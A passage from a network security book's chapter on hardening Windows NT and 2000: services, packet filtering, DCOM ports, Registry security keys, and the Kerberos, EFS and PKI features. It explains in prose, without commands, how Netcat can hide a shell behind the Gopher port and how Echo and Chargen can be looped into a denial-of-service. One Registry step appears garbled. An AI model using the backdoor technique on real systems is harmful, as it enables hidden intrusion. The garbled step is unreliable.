for each of the three services are to be \nplaced under their respective root directory. \nThe fourth directory is for scripts. Web applications developed with CGI, WINCGI, Visual Basic, or Perl can be \nstored in this directory. It also contains some sample scripts and a few development tools. \nNote \nThere have been quite a few vulnerabilities found with IIS—probably more than with the \nNT operating system itself. Make sure you have installed all available and stable security \nhotfixes. You should also review the IIS directory structure and set appropriate \npermission levels. \nIIS requires that IP be installed. During IIS installation, a menu folder called Microsoft Internet Server is created \nfor the management tools required for these services. \nMicrosoft TCP/IP Printing \nMicrosoft’s TCP/IP printing allows an NT Server to support UNIX printing, referred to as line printer daemon \n(lpd). TCP/IP printing allows the NT Server to print to a print server that supports lpd, or to a UNIX system that \nhas a directly connected printer. \nIP printing also allows the NT Server to act as a printing gateway for Microsoft clients. The NT Server connects to \nlpd via IP and can advertise this printer as a shared resource on NetBEUI. Microsoft clients using only NetBEUI \ncan send print jobs to this advertised share. The NT Server then forwards these jobs on to the lpd printer. \nMicrosoft TCP/IP printing requires that the IP protocol be installed. During installation, it adds a new printer port \ntype called LPR, as shown in Figure 14.21. LPR is Line Printer Remote, which provides remote access to lpd \nprinters. \n \nFigure 14.21: Installing IP printing adds an additional printer port, called the LPR port, through which an NT \nserver can access UNIX printers. \nNetwork Monitor Agent \nThe Network Monitor Agent allows the NT Server to be remotely accessed and monitored by systems running the \nNT Server Network Monitoring Tools. \n" }, { "page_number": 293, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 293\nNetwork Monitor Tools and Agent \nThe Network Monitor Tool installs a network analyzer similar to Novell’s LANAlyzer or Network General’s \nSniffer, except that it can only capture broadcast frames or traffic traveling to and from the NT server. The \nNetwork Monitor Tool allows the server to capture and decode network frames for the purpose of analysis. Figure \n14.22 shows a typical packet capture with the Network Monitor Tool. The tool displays the source and destination \naddress of each system, as well as the protocol in use. \n \nFigure 14.22: The Network Monitor Tool can capture network traffic so that it can be decoded and analyzed. \nWarning \nNetwork Monitor is a great tool for monitoring traffic headed to and from the server. \nIt can also be a major security problem if an attacker is able to access the Network \nMonitor data through a remote agent. Network Monitor can be a useful \ntroubleshooting tool, but you should not leave it active unless you are using it. \nRIP for Internet Protocol \nThe RIP for Internet Protocol service allows the NT Server to use and propagate routing information broadcasts \nfor the IP protocol. RIP is the only dynamic routing protocol supported for IP by the base NT installation. You \ncan, however, download a copy of RRAS from the Microsoft Web site, which adds support for the OSPF routing \nprotocol. \nRPC Configuration \nThe RPC Configuration service enables NT Server support for Remote Procedure Call (RPC). RPC allows an \napplication running on the local system to request services from another application that is running on a remote \nsystem. In order for the application to function correctly, both systems must support RPC. RPC provides similar \nfunctionality to a normal function call, except that RPC supports the calling of a subroutine located on a remote \nsystem. \nSimple TCP/IP Services \nSimple TCP/IP Services installs support for some little-used IP applications such as Echo, Chargen, and Quote of \nthe Day. \nWarning \nUnless you really need these services, Simple TCP/IP should not be installed. This is \nbecause the Echo and Chargen ports can be used to launch a DoS attack against the \nserver or even an entire network segment. \nWhen the Chargen port is transmitted a character, it responds by returning a full set of alphanumeric characters. \nThe Echo port is designed to reflect back all the traffic that has been transmitted to it. There is a DoS exploit that \nspoofs a packet in order to get two systems communicating between these two ports or even to get a single server \nspeaking to itself. The result is that for every character the Echo port reflects back to the Chargen port, the \nChargen port responds with a full set of alphanumeric characters. The result is that network utilization can reach \n100 percent, preventing legitimate traffic from reaching its destination. \n" }, { "page_number": 294, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 294\nSNMP Service \nThe SNMP service allows the NT Server to be monitored by an SNMP management station. It also allows the \nperformance monitor on the NT Server to monitor IP statistics and statistics for IP applications (DNS, WINS, and \nso on). \nWhen the SNMP service is installed, the NT Server can send configuration and performance information to an \nSNMP management station such as Hewlett-Packard’s HP Openview. This allows the status of the NT Server, as \nwell as other SNMP devices, to be monitored from a central location. Monitoring can be performed over the IP or \nIPX protocol. \nThe SNMP service also adds functionality to the NT Performance Monitor. For example, it allows you to monitor \nthe number of IP packets with errors or the number of WINS queries the server has received. Both SNMP and the \napplicable service must be installed for these features to be added to Performance Monitor. \nWindows Internet Name Service (WINS) \nA WINS server allows NetBIOS systems to communicate across a router using IP encapsulation of NetBIOS. The \nWINS server acts as a NetBIOS Name Server (NBNS) for p-node and h-node systems located on the NT Server’s \nlocal subnet. WINS stores the system’s NetBIOS name, as well as its IP address. \nEach WINS server on the network periodically updates the other WINS servers with a copy of its table. The result \nis a dynamic list, mapping NetBIOS names to IP addresses for every system on the network. A copy of the list is \nthen stored on each WINS server. \nWhen a p-node system needs the address of another NetBIOS system, it sends a discovery packet to its local \nWINS server. If the system in question happens to be located on a remote subnet, the WINS server returns the \nremote system’s IP address. This allows the remote system to be discovered without propagating broadcast frames \nthroughout the network. When h-nodes are used, the functionality is identical to the p-node, except that an h-node \ncan fall back to broadcast discovery if the WINS server does not have an entry for a specific host. \nWINS requires that the IP protocol be installed. During WINS installation, a menu option for WINS Manager is \nadded to the Administrative Tools menu. \n \nPacket Filtering with Windows NT \nWindows NT supports static packet filtering of IP traffic. While the capabilities of this filtering are somewhat \nrudimentary, they can be useful for providing some additional security. Since NT uses static packet filters, it is not \ncapable of maintaining state. This means that NT’s filters are unable to distinguish between legitimate \nacknowledgment traffic and possible attacks. \nNote \nSee Chapter 5 for an in-depth discussion of static packet filtering versus dynamic packet \nfiltering. \nWindows NT does not allow you to specify the direction of traffic when applying your packet filters. All filtering \nis done on inbound SYN=1 traffic only. This means that if someone is able to compromise your system, NT’s \npacket filters will be unable to prevent the attacker from relaying information off the system. Finally, NT does not \nallow you to filter on IP address. This means that any access control policy you create will be applied to all \nsystems equally. In other words, you could not create an access control policy that only allows access from a \nspecific subnet. \nEnabling Packet Filtering \nTo enable packet filtering, go to Network Properties ¾ Protocols and double-click the TCP/IP protocol. This will \nproduce the Microsoft TCP/IP Properties screen. With the IP Address tab selected, click the Advanced button \nlocated at the bottom right side of the window. This will produce the Advanced IP Addressing screen shown in \nFigure 14.23. \n" }, { "page_number": 295, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 295\n \nFigure 14.23: The Advanced IP Addressing screen \nFrom the Advanced IP Addressing screen, click Enable Security so that the box is checked. This will activate the \nConfigure button located just below it. Clicking the Configure button will produce the TCP/IP Security screen \nshown in Figure 14.24. The TCP/IP Security screen is used to configure all packet filtering access control policies \nthat will be implemented on the system. \n \nFigure 14.24: The TCP/IP Security screen \n" }, { "page_number": 296, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 296\nConfiguring Packet Filtering \nThe topmost field on the TCP/IP Security screen is labeled Adapter. This allows you to scroll through all the \nnetwork adapter cards installed in the system, so that you can assign a different access control policy to each one. \nThis is useful if you have a multi-homed server that connects to two different subnets and you wish to provide \ndifferent services to each. For example, you could leave all services enabled on one network card while limiting \nhosts on the other subnet to only accessing HTTP (TCP port 80). \nThe TCP/IP Security screen also lets you define which services can be accessed through the selected network card. \nFor example, in Figure 14.24 we have specified that all users located off the DEC PCI network card should only \nbe allowed access to services on TCP port 80. This access rule applies to the subnet directly connected to the DEC \nPCI card, as well as any other subnets that may be sitting behind this one on the other side of another router. \nTo understand the effects of the packet filter setting, take a look at Figure 14.25. This figure is the result of an IP \nport scan performed on an NT Server. Notice that the scan has detected a number of open ports on this server. \n \nFigure 14.25: A port scan performed against an unprotected NT Server \nFigure 14.26 is a port scan of the same NT Server after it has been configured with the access control policy \nshown in Figure 14.24. Notice that the only port still responding to service requests is port 80 (HTTP). If this were \na multi-homed system, we could continue to offer all services off another network card, while hosts connecting \nthrough this network would only have access to Web services. \n \nFigure 14.26: A port scan performed against an NT Server using packet filtering \nReturning to the TCP/IP Security screen shown in Figure 14.24, you have three different options for controlling IP \ntraffic. The first box, labeled TCP Ports, allows you to specify which inbound ports should be active on the \nsystem. You can choose Permit All, which will allow all TCP traffic, or you can choose Permit Only, which \n" }, { "page_number": 297, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 297\nallows you to specify inbound access to only certain ports. To add a new port, simply click the Add button and \ntype in the number of the port you wish to leave open. These filter settings will only affect TCP packets with the \nflag setting SYN=1. If traffic is received for a specific port but the SYN flag is not set, the packet filters will not \nblock the traffic. \nNote \nRemember that NT’s packet filters only filter in an inbound direction. This means that \nyou are not required to open upper port numbers in order to allow acknowledgments back \nto the requesting host. \nAlong with filtering TCP traffic, NT’s packet filters allow you to filter on UDP, as well. Remember that NT’s \npacket filters are static, not dynamic. This means that NT may not be as effective at filtering UDP traffic as a real \nfirewall. With TCP traffic, NT can make filtering decisions based on the value of the SYN flag. Since UDP does \nnot use flags, this is not an option. Finally, the TCP/IP Security screen also allows you to filter traffic based on \ntransport. Within the IP Protocols box, you are allowed to click the Add button and specify only certain transports \nby name. \nOnce you have configured your packet filter settings, click the OK button from each of the four open screens. You \nwill need to reboot the system for your filters to take effect. \nA Final Word on NT Ports \nNT does not report conflicts caused by two or more applications acting on a specific port. This means that any \nports that are blocked by the packet filters will not produce an error message in Event Viewer. This also means \nthat you need to inspect your system very carefully in order to identify which services are running. \nFor example, review the port scan we performed in Figure 14.25. The server appears to be running the following \nservices: \nƒ \nWINS (port 42) \nƒ \nRPC (port 135) \nƒ \nNetBIOS over IP (port 139) \nƒ \nInternet Information Server (IIS) \nIIS includes port 21 for FTP, port 70 for Gopher, and port 80 for HTTP. In other words, this looks like a normal \nNT Server. There is nothing in this port scan that would raise a network administrator’s suspicions. \nThe fact is, this server is hiding a surprise. If you telnet to port 70 of this system, you are presented with a \ncommand prompt, as shown in Figure 14.27. You are not prompted for a password, and you are able to gain \nimmediate access to the file system. Obviously, this is not the type of response you would expect from a Gopher \nserver. \n \nFigure 14.27: A command session with what appears to be a normal NT Server \nHow did this happen? The NT Server in question is running a copy of L0pht’s Netcat for NT. Netcat is an all-\npurpose utility that can act as a client as well as a server. It also has the ability to bind itself over another service \nlistening on the same port number. Thus Netcat is able to accept and process inbound service requests before the \nGopher service is able to detect the traffic. This means that the network administrator would have to actually \nattempt a connection with every active port in order to ensure that the correct service is listening. \nSince NT does not report conflicts between multiple applications that attempt to bind to the same listening port, \nNetcat produces no telltale error messages. In fact, it is even possible to launch Netcat so that it would listen for \n" }, { "page_number": 298, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 298\ninbound service requests on a port that is supposed to be blocked by your packet filter policy. In other words, it is \npossible to have applications accept inbound connection requests before the request is subjected to the filters. \nAgain, this type of activity generates no error log messages. \nTip \nThe moral of this story is that even if you think you have locked a system down tight, it is \nalways a good idea to perform a system review on a regular basis. This review should \ninclude a check of which processes are running in memory, as well as what type of response \nyou receive when connecting to each of the active ports. \n \nSecuring DCOM \nThe Distributed Component Object Model (DCOM) is an object-oriented approach to making Remote Procedure \nCalls (RPC). Thus DCOM is sometimes referred to as Object RPC. DCOM is designed to replace Microsoft’s \noriginal specification called Object Linking and Embedding (OLE) remote automation. The benefit of DCOM \nover OLE is that DCOM is designed to support multiple flavors of operating systems. \nA DCOM client will initially connect to the DCOM server using a fixed port number of UDP 135 (NT RPC). The \nDCOM server then assigns the ports it will use dynamically. This makes DCOM applications such as NetMeeting \nand Exchange extremely difficult to support if client traffic must pass through a firewall. Unlike most applications, \nwhich would only require you to open a single port (such as SMTP, which uses TCP port 25), DCOM requires that \nall ports above 1023 be left open. Depending on which Windows platforms you are using, you may need to open \nports for TCP, UDP, or both. Obviously, this makes supporting any DCOM application across a firewall a severe \nsecurity threat. \nSelecting the DCOM Transport \nThere is an excellent paper written by Michael Nelson located at \nwww.microsoft.com/com/wpaper/dcomfw.asp. This article discusses how to go about limiting the \nrange of ports used by DCOM applications. In short, the article mentions that all Windows operating systems \ndefault to TCP as the DCOM transport, except for Windows NT version 4.0. \nTip \nOne of the best ways to begin limiting the number of ports used by DCOM is to ensure that \nall of your systems are using the same transport. \nTo change your NT 4.0 systems to use TCP as their default DCOM transport, launch regedt32 and find the \nfollowing key: \nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc \nThis will produce the Registry Editor screen shown in Figure 14.28. The left pane shows the hive objects we \nneeded to navigate in order to find this specific key. The right pane shows the actual key value. This key defines \nthe protocol search order to be used by DCOM. Notice that the first protocol that DCOM is set to use is UDP/IP, \nwhich is defined by the ncadg_ip_udp key value. \n \nFigure 14.28: Using Registry Editor to change the DCOM default protocol \nOnce you locate this key, double-click the values in the right pane. This will produce the Multi-String Editor \nwindow shown in Figure 14.29. From top to bottom, each line defines the protocol search order for DCOM to use. \nFor example, if DCOM attempts to connect to a remote system using UDP/IP and that connection fails, this \nwindow defines that DCOM should then attempt a connection using IPX. \n" }, { "page_number": 299, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 299\n \nFigure 14.29: The Multi-String Editor showing DCOM’s protocol search order \nTo change the default search order so that the TCP/IP connections are attempted first, use Cut and Paste to move \nthe ncacn_ip_tcp from being the third listed item to being the first. Once this is complete, click the OK button and \nexit Registry Editor. You will need to reboot the system for your changes take effect. \nTip \nSince the Multi-String Editor does not have an Edit menu option, you must use Ctrl+X to \ncut the highlighted text string and Ctrl+V to paste it. \nLimiting the Ports Used by DCOM \nNelson’s paper also describes how to limit the range of ports used by DCOM, forcing DCOM applications to use \nonly the ports you specify. This eases the burden of supporting DCOM through a packet filter or a firewall by \nlimiting the ports used to a select few—rather than all ports above 1023. \nNote \nThis does not limit which applications try to use DCOM; it simply limits the ports used by \nDCOM itself. \nTo define the ports used by DCOM, launch regedt32 and go back to the key you were editing in the last section of \nthis chapter: \nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc \nWith this key highlighted, select Edit ¾ Add Key from the Registry Editor menu. This will produce the Add Key \ndialog box. In the Key Name field, type in the name Internet and click OK. You should now see a key value \nnamed Internet appear below Rpc. Click the Internet object so that the entry becomes highlighted. \nTable 14.1 shows the values that you will need to add to this key. Values are added by selecting Edit ¾ Add Value \nfrom the Registry Editor menu. When the Add Value window appears, you need to enter the value name and data \ntype. Clicking the OK button will produce the String Editor. In the String Editor window, enter the string value \nshown in Table 14.1. \nTable 14.1: Required Key Changes to Make DCOM Use Fixed Port Numbers \nValue Name \nData Type \nString \nValue \nPorts \nREG_MULTI_SZ \n57100-\n57120 \n57131 \n \n \nPortsInternetAvailable \nREG_SZ \nY \nUseInternetPorts \nREG_SZ \nY \nThe Ports string value defines which ports may be used by DCOM. Each line may specify a specific port number \nor a range. For example, in Table 14.1 ports 57100–57120 have been defined as ports that DCOM can use. An \nadditional port, 57131, has also been defined. If you will be supporting DCOM through a firewall, the string \nvalues you associate with the Ports key are the inbound port numbers you will need to open from the Internet to \nyour server. \nNote \nWhen assigning DCOM ports, it is a good idea to never statically assign the ports 1–\n49151, as these may be in use by another service or may be dynamically assigned by the \nsystem before the DCOM application is activated. When statically assigning ports, use \nonly private port numbers that range from 49152 through 65535. For more information, \nsee: ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers. \nDCOM and NAT \nOne of the caveats about DCOM is that raw IP address information is passed between systems. This means that \nnetwork address translation cannot be used. NAT is typically used to translate private IP address space into legal \nIP address space for the purpose of communicating on the Internet. If the DCOM server is sitting behind a device \nperforming NAT, DCOM will not work. This is because the client will attempt to reach the system using the IP \n" }, { "page_number": 300, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 300\naddress information embedded in the data stream. If you need to support DCOM applications over the Internet, \nyou cannot use NAT to translate IP address information. \nTip \nYou can use DCOM applications across the Internet using private address space if the data \nstream will be traveling along a VPN tunnel. This is because a tunnel supports the use of \nprivate address space without performing NAT. See Chapter 10 for more details. \n \nPorts Used by Windows Services \nMicrosoft uses a number of ports and services that are unique to the NT operating system. \nWhile the port numbers used by services such as SMTP, FTP, and HTTP are documented in \nRequest For Comment (RFC) 1700, many of the ports used for Windows-specific services, \nsuch as WINS or remote event viewing, are not as well documented. This can make \nsupporting Microsoft services extremely difficult across subnets where firewalls or packet \nfilters are being used. \nTable 14.2 lists a number of common Windows services along with the transport and port \nnumbers they use. \nTable 14.2: Transport and Port Numbers for Common Windows Services \nName \nTransport/Port \nNumber \nb-node browsing \nUDP/137, \nUDP/138 \np-node WINS registration \nTCP/139 \np-node WINS query \nTCP/139 \nWINS replication \nTCP/42 \nLogon \nUDP/137, \nUDP/138, \nTCP/139 \nFile share access \nTCP/139 \nPrinter share access \nTCP/139 \nEvent Viewer \nTCP/139 \nServer Manager \nTCP/139 \nUser Manager \nTCP/139 \nPerformance Monitor \nTCP/139 \nRegistry Editor \nTCP/139 \nNote \nKeep in mind that in some cases you may need to open more than just the port \nnumber listed in Table 14.2. For example, Event Viewer needs to know the IP \naddress used by the remote NT system. If you are not using a local LMHOSTS \nfile, you may need to enable the ports used by WINS, as well. \nTable 14.3 lists a number of Windows applications that rely on DCOM. This means that the \nservice will use one or more fixed ports, as well as random ports above 1023, unless you have \nmade the Registry changes documented in the last section. Also, RPC 135 will default to UDP \n(as shown in the table below) unless you have modified the Registry to use TCP. \nTable 14.3: Windows Applications That Use DCOM \nName \nTransport/Port \nNumber \nDomain Trusts \nUDP/135, \nUDP/137, \nUDP/138, \nTCP/139 \n" }, { "page_number": 301, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 301\nTable 14.3: Windows Applications That Use DCOM \nName \nTransport/Port \nNumber \nDHCP Manager \nUDP/135 \nWINS Manager \nUDP/135 \nMessage Queue \nUDP/135, \nTCP&UDP/18\n01, TCP/2101, \nTCP/2103, \nTCP/2105 \nExchange Client \nUDP/135 \nExchange replication \nUDP/135 \nNote \nThere are a number of additional Registry key changes you must make to an \nExchange server in order to support client communications through a firewall. For \nmore information, see Microsoft’s Knowledgebase articles Q148732 and \nQ155831. \n \nAdditional Registry Key Changes \nA review of Microsoft’s Web site reveals a number of other Registry keys that may be modified in order to \nenhance security. All key entries should be changed using the regedt32 utility. The predecessor to this utility, \nregedit, does not have some of the advanced functionality of regedt32, such as support for multi-part keys. \nNote \nAs mentioned earlier in this chapter, make sure you generate an emergency recovery disk \nbefore attempting to edit the Registry. \nLogon Banner \nBy modifying certain Registry keys, it is possible to change the Windows NT logon process so that pressing \nCtrl+Alt+Del produces a logon banner. This banner is a dialog box that can be used to display a legal notice or \nsystem usage policy. Before users can authenticate to the system, they must click OK or press Enter to make the \nactual logon screen appear. \nTo add a logon banner, launch regedt32 and find the key: \nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\Current Version\\Winlogon \nWithin this key you will find two key values, one named LegalNoticeCaption and the other named \nLegalNoticeText. Click either of these two objects in order to modify the value. The LegalNoticeCaption value is \nthe text that will appear in the title area of the dialog box. The LegalNoticeText value is the actual text that will \nappear within the dialog box itself. Once you have made your changes, exit regedt32 and reboot the system. \nHiding the Last Logon Name \nAs a convenience, Windows NT retains the logon name of the last user to log on to the system locally. This allows \nthe system to fill in the logon name field the next time someone attempts to authenticate to the system by pressing \nCtrl+Alt+Del. For a high-security environment, this may not be considered acceptable because it can provide \nanyone passing by the system with a valid logon name. \nIn order to prevent Windows NT from presenting the name of the last user to log on to the system, find the \nfollowing Registry key: \nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\Current Version\\Winlogon \nHighlight the Winlogon key and select Edit ¾ Add Value from the Registry Editor menu. When the Add Value \nwindow appears add a value name of DontDisplayLastUserName with a data type of REG_SZ. When you click \nthe OK button, the String Editor window will appear. Enter a string value of 1. \nOnce you have entered the string value, click OK, and exit the regedt32 utility. You will need to reboot the system \nbefore the changes will take effect. \n" }, { "page_number": 302, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 302\nSecuring the Registry on Windows NT Workstation \nYou can edit the Registry on a Windows NT system across the network, as well as from the local machine. On a \nWindows NT Server, remote Registry access is restricted to administrator-level accounts. On a Windows NT \nWorkstation, however, no such restriction exists. \nIn order to restrict Registry access to administrators on NT Workstation, find the following Registry key: \nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentcontrolSet\\Control\\SecurePipeServers \nYou will first need to create a key named winreg beneath this object. This is performed by highlighting \nSecurePipeServers and selecting Edit ¾ Add Key from the Registry Editor menu. Once this key has been created, \nyou should highlight it and select Edit ¾ Add Value from the Registry Editor menu. When the Add Value window \nappears, add a value name of REG_DWORD with a data type of REG_SZ. When you click the OK button, the \nString Editor window will appear. Enter a string value of 1. \nOnce you have entered the string value, select OK, and exit the regedt32 utility. You will need to reboot the \nworkstation before the changes will take effect. \nSecuring Access to Event Viewer \nBy default, Windows NT allows guests and null users access to entries in the Event Viewer System and \nApplication logs. This information can be used by an attacker in order to identify further vulnerabilities on the \nsystem. The Security log is exempt from this setting because access is controlled by the Manage Audit Log \nsettings in User Manager. To ensure that the System and Application logs are only accessed by administrator-level \naccounts, find the following keys: \nHKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\EventLog\\Application \nHKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\EventLog\\System \nHighlight the Application key and select Edit ¾ Add Value from the Registry Editor menu. When the Add Value \nwindow appears, type in a value name of RestrictGuestAccess with a data type of REG_DWORD. When you \nclick the OK button, the String Editor window will appear. Enter a string value of 1. Once you have entered the \nstring value, click OK and highlight the System key. \nRepeat these steps for the System key, as well. \nCleaning the Page File \nThe page file is the area of the hard disk used by Windows NT as virtual memory. As part of memory \nmanagement, Windows NT will move inactive information from physical memory to the page file so that more \nphysical memory will be available for active programs. When the Windows NT system is shut down, there is no \nguarantee that this information will be completely removed. Thus an attacker who is able to boot the system to an \nalternate operating system may be able to read information that was stored in this file. \nTo ensure that the contents of the page file are purged during shutdown, locate the following key: \nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session \nManager\\Memory Management \nHighlight the Memory Management key and select Edit ¾ Add Value from the Registry Editor menu. When the \nAdd Value window appears, type in a value name of ClearPageFileAtShutdown with a data type of \nREG_DWORD. When you click the OK button, the String Editor window will appear. Enter a string value of 1. \nOnce you have entered the string value, click OK, and exit the regedt32 utility. \nNote \nThe system will require two reboots before the page file is wiped. \n \nWindows 2000 \nWindows 2000 includes many new security features, including \nƒ Active Directory, which is designed to replace the flat security structure of the current domain \narchitecture \nƒ Encrypting File System \nƒ Kerberos version 5 \n" }, { "page_number": 303, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 303\nƒ Public key certificate services \nƒ IPSEC support \nƒ Support for smart cards \nActive Directory \nWhile NT 4.0 provided a flat, non-extensible directory service Active Directory provides a very flexible, \nhierarchical, and expandable directory service. \nThere are three ways of looking at Active Directory: \nAs a Store Active Directory stores information about network objects hierarchically, and makes \nthis information available to users, applications, and services. \nAs a Structure All network objects and services are stored as objects within Active Directory. \nConstructs such as domains, trees, forests, trust relationships, organizational units, and sites are \nincluded. \nAs a Team Player Active Directory uses standard directory access protocols and can communicate \nwith other directory services and applications. \nOther features of Active Directory include the following: \nDNS integration All Active Directory services utilize DNS to advertise, locate, and connect to all \nnetwork services. \nExtensibility The schema (or structure) of the Active Directory is extensible, meaning that new \nclasses of objects and new attributes of existing classes can be added by administrators or \napplications. \nObject-based policies Also known as Group Policies, these settings determine user access to \nresources and how these resources can be used. \nScalability Active Directory uses one ore more domains, each with one or more domain \ncontrollers. Multiple domains can be combined into a domain tree and multiple domain trees can be \ncombined into a forest. A single domain network is still a single tree and single forest. \nMultimaster replication All domain controllers are created equal in the sense that a change to the \ndirectory can occur on any domain controller, which in turn updates all the other domain \ncontrollers. If one domain controller fails, the others can take over its load. \nCentralized security AD authorizes each user’s access to the network. In addition, access control \ncan be defined not only on each object in the directory, but also on each property of each object. \nInteroperability LDAP (Lightweight Directory Access Protocol) allows AD to share object \ninformation with applications and other directory services. \nEncrypting File System (EFS) \nIn NT 4.0, user access to files is controlled by Access Control Lists (ACLs). But what if physical control of a \ncomputer system is lost? What happens if a laptop is stolen? There are many tools available to a hacker that would \n" }, { "page_number": 304, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 304\npermit them to boot the machine in a different operating system that didn’t respect ACLs, and sensitive \ninformation could be read. \nTo overcome this problem, Microsoft integrated the Encrypting File System (EFS) into Windows 2000. EFS is \nbased on public-key encryption, taking advantage of the CryptoAPI architecture in Windows. Each file is \nencrypted using a randomly generated key, called the file encryption key. File encryption uses symmetric \nencryption algorithms, but future releases will allow other schemes. \nEFS is integrated with the NT File System (NTFS). When temporary files are created, the attributes from the \noriginal file may be copied to temporary fields as long as all files are on the NTFS volume. If the original file is \nencrypted, EFS encrypts its temporary copies when attributes are transferred during file creation. EFS resides in \nthe Windows 2000 kernel and uses the non-paged pool to store file encryption keys, ensuring that they never make \nit to the paging file. \nOther characteristics of EFS include: \nUser interaction By default, no administrator action is necessary to enable encryption. Encryption \nand decryption are handled transparently on a per-file or per-directory basis. \nData recovery W2K allows EFS only when the system is configured with one or more recovery \nkeys. Data recovery is intended for business environments where the organization expects to be able \nto recover data encrypted by an employee after an employee leaves or when encryption keys are \nlost. \nCommand-line The Cipher utility lets users encrypt and decrypt files and folders from a command \nline (or an administrative script). \nKerberos Version 5 \nPrior to W2K, Microsoft relied on the NTLM protocol for user authentication. Starting with W2K, Microsoft has \nintegrated an open, industry-standard protocol developed by MIT, called Kerberos. Now in its fifth version, \nKerberos is a mature and robust protocol that provides many advantages over NTLM, including: \nMore efficient authentication to servers With NTLM, an application server must connect to a \ndomain controller in order to authenticate each client. With Kerberos, the server authenticates the \nclient by examining credentials presented by the client. Credentials are reusable throughout the \nentire session. \nMutual authentication NTLM allows servers to verify the identities of their clients. It does not \nallow clients to verify server’s identity, or one server to verify the identity of another. Kerberos \nassumes nothing—parties at both ends of a connection can know that the party on the other is who it \nclaims to be. \nDelegated authentication Windows services impersonate clients when accessing resources on \ntheir behalf. Some distributed applications are designed so that a front-end service must \nimpersonate clients. The Kerberos protocol has a proxy mechanism that allows a service to \nimpersonate its client when connecting to their services. No equivalent is available with NTLM. \nSimplified trust management One of the benefits of Kerberos is that trust between the security \nauthorities for Windows 2000 domains is two-way and transitive (by default). Credentials issued by \nthe security authority for any domain are accepted everywhere in the tree. \n" }, { "page_number": 305, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 305\nInteroperability Microsoft follows the Kerberos standards as specified by the Internet Engineering \nTask Force (IETF), which allows W2K to play nice with other networks using Kerberos for \nauthentication. \nPublic Key Certificate Services \nPrior to W2K, encryption was implemented in a fragmented and isolated fashion. With the growth of the Internet \nand distributed, interoperating networking systems, authenticating the participants of a data session and then \nencrypting the subsequent session have become minimum standards of data processing. \nPublic-key cryptography provides three capabilities that are critical for modern networks: \nPrivacy Encrypting all network communication, including e-mail, voice, and instant messaging. \nAuthentication Verifying the identity of all participants of a session—for the full duration of the \nsession. \nNon-repudiation Creating a binding record of all transactions performed by all parties during a \nsession. \nTraditional cryptography relies on secret keys, wherein two parties share a single secret key that is used to both \nencrypt and decrypt data. Loss or compromise of the secret key makes the data it encrypts vulnerable. Public-key \nsystems, on the other hand, use two keys: a public key that is shared, and a private key that is closely held. These \nkeys are complementary in the sense that if you encrypt something with the public key it can only be decrypted \nwith the corresponding private key, and vice versa. \nFor example, if Bob wants to send Alice some private data, he uses her public key to encrypt, then sends it to her. \nUpon receiving the encrypted data, Alice uses her private key to decrypt it. The important concept here is that \nAlice can freely distribute her public key in order to allow anyone in the world to encrypt data that only she can \ndecrypt. If Bob and Chuck both have copies of her public key, and Chuck intercepts an encrypted message from \nBob to Alice, he will not be able to decrypt it; only Alice’s private key can that, and she is the only person who \nholds it. \nThe previous example takes care of privacy, but what about authentication and non-repudiation? For this we turn \nto the concept of signing. Signing also uses encryption, but the goal is to prove the origin of the data. If Alice \nwants the world to know that she is the author of a message, she encrypts it using her private key and posts the \nmessage publicly. The only way this message can be decrypted is to use Alice’s freely available public key—thus \nverifying the source of the message as Alice. \nUsed together, encryption and signing provide for privacy, authentication, and non-repudiation. The framework \nthat provides these services is known as Public Key Infrastructure (PKI). PKI is the operating system and services \nthat make it easy to implement and manage public keys, and it provides features including \nKey Management PKI makes it easy to issue, review, and revoke keys, as well as manage the trust \nlevel attached to keys. \nPublish Keys PKI offers an easy format for users to locate and retrieve public keys (including \ndetermining whether they are valid or not). \nUse Keys PKI provides integration with third-party applications to easily select which combination \nof services (encryption and signing) to perform. \nWhile public keys are the objects that PKI uses (private keys are always stored privately), they are usually \npackaged as digital certificates. The certificate contains the public key and a set of identifying details like the key-\nholder’s name. The binding between attributes and the public key is present because the certificate is digitally \nsigned by the entity that issues it; the issuer’s signature on the certificate vouches for its authenticity and \ncorrectness. \n" }, { "page_number": 306, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 306\nThe problem is, of course, in determining the validity of the entity that issues a certificate in the first place. The \nanswer lies in the concept of a certificate hierarchy. In a hierarchy, each issuer (known as a certificate authority) \nsigns each certificate that it issues (with its private key). The public half of the CA’s key-pair is itself packaged in \na certificate—one that was issued by a higher-level CA. This pattern can continue through as many levels as \npossible, but eventually there must be a top-level CA. This CA, known as the root certificate authority, signs its \nown certificate. Obviously, an end user has to trust that the root certificate is who it says it is. \nWell-known commercial CAs like Thawte and Verisign issue certificates to millions of users. W2K includes its \nown PKI, which can be used to issue certificates but also provides services to manage and use them. The primary \ncomponents of W2K PKI are \nCertificate Services This central PKI service allows organizations to act as their own CAs, giving \nthem the ability to issue and manage digital certificates. \nActive Directory As a directory service, AD serves as the publication service for PKI. \nPKI-enabled applications Internet Explorer, Microsoft Money, Internet Information Server, \nOutlook, and Outlook Express, as well as many other third-party applications can use W2K PKI. \nExchange Key Management Service (KMS) This component of Microsoft Exchange archives \nand retrieves keys used to encrypt and sign e-mail. \nMicrosoft has made an effort to follow open PKI standards. Some of these are shown in Table 14.4: \nTable 14.4: PKI Standards Supported by W2K \nStandard \nWhat it does \nX.509 \nControls format and content of digital certificates \nCRL ver. 2 \nControls format and content of 